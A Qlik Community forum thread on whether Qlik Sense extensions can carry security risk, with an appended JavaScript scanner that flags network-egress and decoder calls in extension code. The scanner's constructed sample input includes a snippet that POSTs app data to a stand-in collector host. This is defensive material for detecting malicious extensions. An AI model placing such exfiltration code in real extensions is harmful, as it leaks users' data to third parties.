Qlik Community

Qlik Sense Integration, Extensions, & APIs

Discussion board where members can learn more about Integration, Extensions and API’s for Qlik Sense.

swarup_malli
Valued Contributor

Can extensions carry security risk?

Hi,

I found a couple of open source extensions. But before installing them on the Qlik Sense server, I want to make sure they do not contain any trojan program that could pose a security risk.

Any tips on how to look for malicious code in extensions?

3 Replies
satishkurra
Valued Contributor II

Re: Can extensions carry security risk?

Make sure you are downloading from trusted sites and the websites of Qlik Partners.

Also, you can refer to Stefan Walther's website:

qlikblog.at | QlikView / Qlik Sense Blog by Stefan Walther

Employee

Re: Can extensions carry security risk?

So, as a rule of thumb, extensions pose as much security risk as browsing to Facebook.com, Google.com or any random web page on the web.

Extensions are client-side technology, meaning they execute within the sandbox that is the user's browser, so they can't access anything on the server or outside the normal resources a browser can access on the local machine.

The potential risk you are running is that an extension could intercept the data from an app and then pipe that to a third-party server somewhere. So I would scan for any outgoing connections such as XMLHttpRequest, WebSockets, etc.

The Qlik cookies available to steal won't reveal anything special to the attacker apart from a session id which you can lock down with extended security in your virtual proxy.
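One way to run the scan for outgoing connections suggested in the reply above, as an added example that is not part of the original thread and not Qlik's own tooling. It goes beyond the two APIs named there (fetch, sendBeacon, EventSource, jQuery/Angular helpers, hard-coded URLs); the pattern list, function names and sample input are assumptions made for illustration.

```javascript
// Added example: flag network-egress APIs in extension source for manual review.
// The pattern list is an assumption for illustration, not a Qlik-provided list.
const EGRESS_PATTERNS = [
  { api: 'XMLHttpRequest', re: /\bXMLHttpRequest\b/ },
  { api: 'WebSocket', re: /\bWebSocket\b/ },
  { api: 'fetch', re: /\bfetch\s*\(/ },
  { api: 'sendBeacon', re: /\bsendBeacon\s*\(/ },
  { api: 'EventSource', re: /\bEventSource\b/ },
  { api: 'jQuery/Angular ajax', re: /\$\.(ajax|get|post|getJSON)\s*\(|\$http\b/ },
  { api: 'dynamic element', re: /createElement\s*\(\s*['"](script|img|iframe)['"]|new\s+Image\b/ },
  { api: 'absolute URL', re: /['"`](https?|wss?):\/\/[^'"`\s]+/ },
  // Static matching misses obfuscated calls, so decoders are flagged too.
  { api: 'eval/decoder', re: /\beval\s*\(|\batob\s*\(|\bFunction\s*\(/ },
];

// Return one finding per (line, pattern) hit in a single file's text.
function scanSource(file, text) {
  const findings = [];
  text.split(/\r?\n/).forEach((line, i) => {
    for (const { api, re } of EGRESS_PATTERNS) {
      if (re.test(line)) findings.push({ file, line: i + 1, api, code: line.trim().slice(0, 120) });
    }
  });
  return findings;
}

// Walk an unpacked extension folder (Node.js) and scan its .js/.html files.
function scanDirectory(dir) {
  const fs = require('fs');
  const path = require('path');
  return fs.readdirSync(dir, { withFileTypes: true }).flatMap((entry) => {
    const full = path.join(dir, entry.name);
    if (entry.isDirectory()) return scanDirectory(full);
    if (!/\.(js|html?)$/i.test(entry.name)) return [];
    return scanSource(full, fs.readFileSync(full, 'utf8'));
  });
}

// Constructed sample input (not taken from any real extension).
const SAMPLE = [
  "define(['qlik'], function (qlik) {",
  '  return { paint: function ($element, layout) {',
  '    var x = new XMLHttpRequest();',
  "    x.open('POST', 'https://collector.example.invalid/in');",
  '    x.send(JSON.stringify(layout));',
  '  } };',
  '});',
].join('\n');
console.log(scanSource('sample.js', SAMPLE));
```

Each hit is a lead for manual review rather than a verdict, since legitimate extensions also load assets and call APIs; minified or obfuscated code needs to be read by hand.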

swarup_malli
Valued Contributor

Re: Can extensions carry security risk?

Thank you guys! Sorry for the late reply.
